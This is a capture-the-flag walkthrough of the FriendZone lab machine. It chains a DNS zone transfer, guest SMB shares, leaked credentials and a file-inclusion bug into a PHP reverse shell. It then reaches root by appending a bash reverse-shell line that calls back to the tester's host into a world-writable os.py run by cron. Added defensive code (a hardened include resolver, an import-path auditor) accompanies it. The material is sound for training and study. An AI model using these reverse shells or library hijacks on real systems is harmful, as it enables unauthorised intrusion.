Hi there, this is my walkthrough of the FriendZone machine. An easy box, but I had so much fun with it.
- OS: Linux
- IP: 10.10.10.123
- Difficulty: Easy
Let's start with nmap xD.
```
$ nmap -sV -sC -A -Pn 10.10.10.123
Starting Nmap 7.30 ( https://nmap.org ) at 2019-06-06 23:14 KST
Nmap scan report for 10.10.10.123
Host is up (0.30s latency).
Not shown: 993 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|_  256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
53/tcp  open  domain
| dns-nsid:
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: ERROR: Script execution failed (use -d to debug)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -0s, deviation: 0s, median: -0s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2019-06-06T17:14:52+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

Post-scan script results:
| clock-skew:
|_  -0s: Majority of systems scanned

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.41 seconds
```
The services that interested me most were:
- FTP (vsftpd 3.0.3) was running, but it required a username and password.
- HTTP and HTTPS were both running too xD
- The box was also acting as a DNS server (BIND 9.11.3), and the TLS certificate on port 443 leaked a domain name, friendzone.red.
- A Samba file server was running and allowed guest access xD
For http://10.10.10.123 I found this page:
But https://10.10.10.123 only returned Apache's Not Found page.
However, there was an email address on the page: email@example.com. From the nmap result (the certificate's commonName) and this email address, I thought the server hosted 2 domains, friendzone.red and friendzoneportal.red, so I added both to my /etc/hosts file:
```
10.10.10.123 friendzone.red
10.10.10.123 friendzoneportal.red
```
Now I opened the websites again using these domain names. The HTTP pages showed the same result, but over HTTPS I found these pages:
The page source didn't have any interesting hints; there were only those 2 GIF images.
Because port 53 was open, I used dig to request a zone transfer (AXFR) for each domain and check whether any subdomains existed. A name server that answers AXFR for any client hands you its whole zone, and yeah, this one did xD
```
$ dig axfr friendzone.red @10.10.10.123

; <<>> DiG 9.10.6 <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red.                 604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.                 604800  IN  AAAA  ::1
friendzone.red.                 604800  IN  NS    localhost.
friendzone.red.                 604800  IN  A     127.0.0.1
administrator1.friendzone.red.  604800  IN  A     127.0.0.1
hr.friendzone.red.              604800  IN  A     127.0.0.1
uploads.friendzone.red.         604800  IN  A     127.0.0.1
friendzone.red.                 604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 377 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Thu Jun 06 23:25:01 KST 2019
;; XFR size: 8 records (messages 1, bytes 261)
```
```
$ dig axfr friendzoneportal.red @10.10.10.123

; <<>> DiG 9.10.6 <<>> axfr friendzoneportal.red @10.10.10.123
;; global options: +cmd
friendzoneportal.red.           604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red.           604800  IN  AAAA  ::1
friendzoneportal.red.           604800  IN  NS    localhost.
friendzoneportal.red.           604800  IN  A     127.0.0.1
admin.friendzoneportal.red.     604800  IN  A     127.0.0.1
files.friendzoneportal.red.     604800  IN  A     127.0.0.1
imports.friendzoneportal.red.   604800  IN  A     127.0.0.1
vpn.friendzoneportal.red.       604800  IN  A     127.0.0.1
friendzoneportal.red.           604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 511 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Thu Jun 06 23:25:25 KST 2019
;; XFR size: 9 records (messages 1, bytes 281)
```
I added the names from the A records to my /etc/hosts file, pointing them at 10.10.10.123 (the zone itself maps everything to 127.0.0.1, which is useless from the attacker's side):
```
10.10.10.123 administrator1.friendzone.red
10.10.10.123 hr.friendzone.red
10.10.10.123 uploads.friendzone.red
10.10.10.123 admin.friendzoneportal.red
10.10.10.123 files.friendzoneportal.red
10.10.10.123 imports.friendzoneportal.red
10.10.10.123 vpn.friendzoneportal.red
```
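The /etc/hosts lines above were typed by hand from the two dig transcripts. The following is an added example (not part of the original write-up) that does the same job for any number of zones: it parses dig's AXFR output format, collects every A/AAAA/CNAME owner name, and maps each one to the real target IP instead of the 127.0.0.1 the zone advertises. The sample text embedded below is a constructed, abridged copy of the friendzone.red transcript; run_axfr() is only there to feed live dig output into the same parser.

```python
"""Turn `dig axfr` output into /etc/hosts lines (added example)."""
import re
import subprocess
from collections import OrderedDict

# Constructed sample in dig's AXFR output format (abridged; the owner names
# match the friendzone.red zone shown in the write-up).
SAMPLE_AXFR = """\
; <<>> DiG 9.10.6 <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red.                 604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.                 604800  IN  AAAA  ::1
friendzone.red.                 604800  IN  NS    localhost.
friendzone.red.                 604800  IN  A     127.0.0.1
administrator1.friendzone.red.  604800  IN  A     127.0.0.1
hr.friendzone.red.              604800  IN  A     127.0.0.1
uploads.friendzone.red.         604800  IN  A     127.0.0.1
friendzone.red.                 604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 377 msec
"""

# dig prints one record per line:  owner  ttl  class  type  rdata
RR_LINE = re.compile(r"^(?P<name>\S+)\s+\d+\s+IN\s+(?P<type>[A-Z]+)\s+(?P<rdata>.+)$")


def axfr_names(text, types=("A", "AAAA", "CNAME")):
    """Unique owner names (trailing dot stripped) of the selected record
    types, in zone order. Comment lines and SOA/NS records are ignored."""
    names = OrderedDict()
    for line in text.splitlines():
        m = RR_LINE.match(line.strip())
        if m and m.group("type") in types:
            names.setdefault(m.group("name").rstrip("."), None)
    return list(names)


def hosts_lines(text, target_ip):
    """One /etc/hosts line per discovered name, all pointing at target_ip
    (the RDATA in the zone is 127.0.0.1 and is deliberately ignored)."""
    return ["%s %s" % (target_ip, name) for name in axfr_names(text)]


def run_axfr(zone, server):
    """Run dig for real. Needs network access and a name server that
    answers AXFR for arbitrary clients, as this box did."""
    proc = subprocess.run(["dig", "axfr", zone, "@" + server],
                          capture_output=True, text=True, timeout=30)
    return proc.stdout


if __name__ == "__main__":
    for line in hosts_lines(SAMPLE_AXFR, "10.10.10.123"):
        print(line)
```

Against the live box you would call `hosts_lines(run_axfr("friendzoneportal.red", "10.10.10.123"), "10.10.10.123")` and append the result to /etc/hosts. If the transfer is refused, dig prints `; Transfer failed.` with no record lines and the parser simply returns an empty list.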
There were 2 admin domains, administrator1.friendzone.red and admin.friendzoneportal.red:
I tried some SQL injection on the login form but it didn't work, and admin.friendzoneportal.red just showed the message "Admin page is not developed yet !!! check for another one". So I thought only the first domain would work.
As the nmap scan showed that SMB was running and allowed guest access, I tried to connect to the file server as the guest user.
There were 3 shares (Files, general and Development), but after trying to mount them, only 2 (general and Development) could be mounted as guest.
Lol, I found some PHP shell files in Development. They were a hint left behind by other players xD. I checked the folder permissions and it was read/write.
And in the general share I found a creds.txt file containing the admin credentials:
```
creds for the admin THING:
admin:WORKWORKHhallelujah@#
```
I used these credentials to log in at https://administrator1.friendzone.red and it showed this message:
```
Login Done ! visit /dashboard.php
```
So, now check /dashboard.php.
The beginner PHP developer of this page told us to add some params to the URL to show the image. Haha, let's try...
I looked around and found nothing. I could only change the image name between a.jpg and b.jpg. But what is that pagename param???
Since I had found PHP shell files inside the shared folder Development, I figured pagename had to be a Local File Inclusion: if I could point it at one of those files, the server would include and execute it. So we need to know the real path of the Development share on the server.
I googled for SMB enumeration and found the smb-enum-shares script for nmap. So I ran nmap again.
```
$ nmap --script smb-enum-shares -p139 10.10.10.123
Starting Nmap 7.30 ( https://nmap.org ) at 2019-06-07 16:45 KST
Nmap scan report for friendzone.red (10.10.10.123)
Host is up (0.49s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn

Host script results:
| smb-enum-shares:
|   account_used: guest
|   Development:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 3
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   Files:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   general:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 92.14 seconds
```
I could see that the Development share was stored at /etc/Development (nmap renders the path Windows-style as C:\etc\Development, but on a Samba host that is simply /etc/Development).
Now I created a reverse shell file named a.php and copied it into that share. I started my netcat listener and triggered the reverse shell through the pagename param on the admin site.
My a.php file should be at /etc/Development/a.php. Using the LFI, I included it as pagename=/etc/Development/a.
I left off the .php extension because the sample value was pagename=timestamp, which means the script appends .php itself; passing the full filename would have made it look for a.php.php.
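To make the reasoning above concrete, here is an added example (not the box's dashboard.php, and written in Python rather than PHP) that models the inferred include logic next to a hardened version. The vulnerable resolver blindly appends ".php", which is why an absolute path without the extension reaches the dropped shell; the hardened one combines an allowlist of page names with a realpath containment check. WEB_ROOT and ALLOWED_PAGES are assumptions about the admin vhost, not values from the box.

```python
"""Vulnerable vs hardened page resolver for a pagename-style include (added example)."""
import os

WEB_ROOT = "/var/www/admin"              # assumed document root of the admin vhost
ALLOWED_PAGES = frozenset({"timestamp"})  # assumed: the only page the app actually ships


def vulnerable_resolve(pagename):
    """Behaves like the dashboard as the write-up infers it: append '.php' and
    include whatever that names. An absolute path in pagename is used as-is,
    so any readable .php on disk (e.g. one dropped on a world-writable Samba
    share) gets executed. Appending the extension is not a defence."""
    return pagename + ".php"


def hardened_resolve(pagename, web_root=WEB_ROOT, allowed=ALLOWED_PAGES):
    """Two independent controls: an allowlist of page names, and a realpath
    containment check so that even a bad allowlist entry cannot escape
    web_root (e.g. through '..' segments or a symlink)."""
    if pagename not in allowed:
        raise ValueError("unknown page: %r" % pagename)
    root = os.path.realpath(web_root)
    path = os.path.realpath(os.path.join(root, pagename + ".php"))
    if os.path.commonpath([root, path]) != root:
        raise ValueError("path escapes web root: %r" % path)
    return path


def rejected(pagename, allowed=ALLOWED_PAGES):
    """True if the hardened resolver refuses the given pagename."""
    try:
        hardened_resolve(pagename, allowed=allowed)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", vulnerable_resolve("/etc/Development/a"))
    print("hardened  :", hardened_resolve("timestamp"))
    print("hardened rejects LFI:", rejected("/etc/Development/a"))
```

The second control matters even with an allowlist: if a developer later adds a relative entry such as "../shared/footer" to the list, the containment check still stops it from resolving outside the web root.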
And my reverse shell listener caught the connection:
```
$ netcat -lvnp 1234
Connection from 10.10.10.123:54510
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 17:37:35 up 34 min,  0 users,  load average: 2.85, 4.84, 5.16
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls /home
friend
$ cd /home/friend
$ ls
user.txt
$ cat user.txt
a9****************************11
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@FriendZone:/home/friend$
```
In /var/www/ I found a mysql_data.conf file containing the database username and password:
```
www-data@FriendZone:/home/friend$ cd /var/www
www-data@FriendZone:/var/www$ ls
admin  friendzone  friendzoneportal  friendzoneportaladmin  html  mysql_data.conf  uploads
www-data@FriendZone:/var/www$ cat mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
```
The database user was called friend, the same as the only home directory on the box, so I tried to SSH in as friend with that password (classic credential reuse between a service account and a system account).
```
Chhaileng@Chhailengs-MacBook-Pro ~ $ ssh friend@10.10.10.123
friend@10.10.10.123's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

You have mail.
Last login: Fri Jun  7 10:34:26 2019 from 10.10.12.75
friend@FriendZone:~$
```
And I got a fully interactive TTY shell.
After getting a shell on the box, I uploaded pspy64 and executed it. This is what I noticed:
The script reporter.py was run by root. I kept watching that process and saw that cron ran the script every few minutes. This is what was inside reporter.py. Most of the code was commented out, but there was still an import os line, which loads the os module from the Python 2.7 standard library.
```python
friend@FriendZone:/opt/server_admin$ cat reporter.py
#!/usr/bin/python

import os

to_address = "firstname.lastname@example.org"
from_address = "email@example.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to firstname.lastname@example.org -from email@example.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later

# Sam ~ python developer
```
I went to the library directory, /usr/lib/python2.7. The interesting thing was that the python2.7 directory itself was world-writable (mode 777):
```
friend@FriendZone:/usr/lib$ ls -la | grep python2
drwxrwxrwx 27 root root 16384 Jun 26 14:27 python2.7
```
And so was the file os.py:
```
friend@FriendZone:/usr/lib/python2.7$ ls -la | grep os.py
-rwxrwxrwx  1 root root 25876 Jun 26 14:32 os.py
```
Since reporter.py was always run by root and imports the os module, I appended a line to the end of os.py that spawns a reverse shell. Inside os.py the name system is already bound (it is pulled in from the posix module), so a bare call at module level runs the moment root's cron job executes import os:
```python
system("bash -c 'bash -i &>/dev/tcp/10.10.12.78/1234 0<&1'")
```
Note that this hijacks every Python 2 process on the box that imports os, not just the cron job, so remove the line again once you have your shell.
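The root cause here is not the cron job but the permissions on the interpreter's import path. The following is an added example (not part of the original write-up) of the check I would run on any host: it walks a list of directories, reports world-writable directories and world-writable copies of the modules a root-run script is almost certain to import, and demo() rebuilds the box's drwxrwxrwx python2.7 / -rwxrwxrwx os.py layout in a temporary directory so the check can be exercised offline. HOT_MODULES is an assumption about which modules are worth flagging, not an exhaustive list.

```python
"""Audit an interpreter's import path for world-writable directories and modules (added example)."""
import os
import stat
import sys
import tempfile

# Modules a root-run script is almost certain to import, hence the highest-value
# hijack targets. Assumption for this example, not an exhaustive list.
HOT_MODULES = ("os.py", "site.py", "sitecustomize.py")


def world_writable(path):
    """True if 'others' have write permission on the real file or directory.
    Symlinks are skipped: on Linux they always show mode 777."""
    st = os.lstat(path)
    return not stat.S_ISLNK(st.st_mode) and bool(st.st_mode & stat.S_IWOTH)


def audit_import_path(dirs, modules=HOT_MODULES):
    """Return (path, problem) pairs. A writable directory is reported even when
    every module in it is fine: an attacker can drop a new .py or .pth file
    that shadows, or is loaded before, the genuine module."""
    findings = []
    for d in dirs:
        if not d or not os.path.isdir(d):   # '' means cwd on sys.path; skip it
            continue
        if world_writable(d):
            findings.append((d, "world-writable directory on import path"))
        for name in modules:
            p = os.path.join(d, name)
            if os.path.isfile(p) and world_writable(p):
                findings.append((p, "world-writable module"))
    return findings


def demo():
    """Recreate the box's permissions (drwxrwxrwx python2.7, -rwxrwxrwx os.py)
    under a fresh temp dir and audit it. Returns just the problem strings."""
    root = tempfile.mkdtemp()
    lib = os.path.join(root, "python2.7")
    os.mkdir(lib)
    with open(os.path.join(lib, "os.py"), "w") as f:
        f.write("# stand-in for the real module\n")
    os.chmod(lib, 0o777)
    os.chmod(os.path.join(lib, "os.py"), 0o777)
    return [problem for _, problem in audit_import_path([lib])]


if __name__ == "__main__":
    # Audit the interpreter this script runs under; on FriendZone you would
    # run it with the same interpreter the cron job uses (/usr/bin/python).
    hits = audit_import_path(sys.path)
    for path, problem in hits or [("(none)", "import path looks sane")]:
        print("%-50s %s" % (path, problem))
```

Run it under the interpreter the privileged job actually uses, since sys.path differs between Python 2 and 3 and between system and virtualenv installs; a clean result from the wrong interpreter proves nothing.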
I also started a netcat listener for this reverse shell and waited for the cron job to execute the script.
And I got a root shell:
```
$ nc -lvnp 1234
Connection from 10.10.10.123:54546
bash: cannot set terminal process group (3435): Inappropriate ioctl for device
bash: no job control in this shell
root@FriendZone:~# id
uid=0(root) gid=0(root) groups=0(root)
root@FriendZone:~# ls
certs  root.txt
root@FriendZone:~# cat root.txt
b0****************************c7
root@FriendZone:~#
```
Rooted, and I hope you enjoy this xD